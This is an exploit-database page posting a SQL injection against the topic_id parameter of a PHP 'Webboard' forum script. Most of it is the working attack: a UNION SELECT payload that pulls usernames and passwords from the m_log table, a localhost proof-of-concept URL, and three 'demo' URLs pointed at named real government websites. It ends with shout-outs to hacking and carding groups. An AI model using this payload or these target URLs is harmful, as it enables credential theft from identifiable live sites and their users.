[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Webboard (topic_id=) SQL Injection Vulnerability

Author
c4uR
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14370
Category
web applications
Date add
08-10-2010
Platform
php
================================================
Webboard (topic_id=) SQL Injection Vulnerability
================================================


  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. cucunya kongSANUN ;)) ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


			AUTHOR		: c4uR
			DATE		: 07 october 2010
			Location	: Jakarta, Indonesia
			Time Zone	: GMT +7:00

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Error in file webboard_view.php

PHP code:

$result : error = select * from tbl_web_q where q_id =

A vulnerable parameter $ topic_id=


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


###############################################################################

3spl0iT :

[+] -7/**/union/**/select/**/all/**/1,2,group_concat(username,0x3a,password,0x3a,chk_status,0x3c62723e),4,5,6,7,8/**/from/**/m_log/**/c4uR


sQl1 p0c :

[+] http://127.0.0.1/webboard/webboard_view.php?topic_id=-7/**/union/**/select/**/all/**/1,2,group_concat(username,0x3a,password,0x3a,chk_status,0x3c62723e),4,5,6,7,8/**/from/**/m_log/**/c4uR

###############################################################################

DEMO:

http://www.thungkhok.go.th/webboard/webboard_view.php?topic_id=-7 /**/ union /**/ select /**/ all /**/ 1,2,group_concat(username,0x3a,password,0x3a,chk_status,0x3c62723e),4,5,6,7,8 /**/ from /**/ m_log /**/ c4uR

http://www.donyanang.go.th/webboard/webboard_view.php?topic_id=-7 /**/ union /**/ select /**/ all /**/ 1,2,group_concat(username,0x3a,password,0x3a,chk_status,0x3c62723e),4,5,6,7,8 /**/ from /**/ m_log /**/ c4uR

http://www.srapanglan.go.th/webboard/webboard_view.php?topic_id=-7 /**/ union /**/ select /**/ all /**/ 1,2,group_concat(username,0x3a,password,0x3a,chk_status,0x3c62723e),4,5,6,7,8 /**/ from /**/ m_log /**/ c4uR

-------------------------------------------------------------------------------

[+] Apartment Griya Semanggi | poinsonV [+]
[+] devilzc0de | hashkiller | indonesian-cyber | YOGYAcarderlink [+]
[+] kacau bener musim hujan 2010 >.< [+]

-------------------------------------------------------------------------------

# qinoryy@yahoo.com



#  0day.today [2024-10-06]  #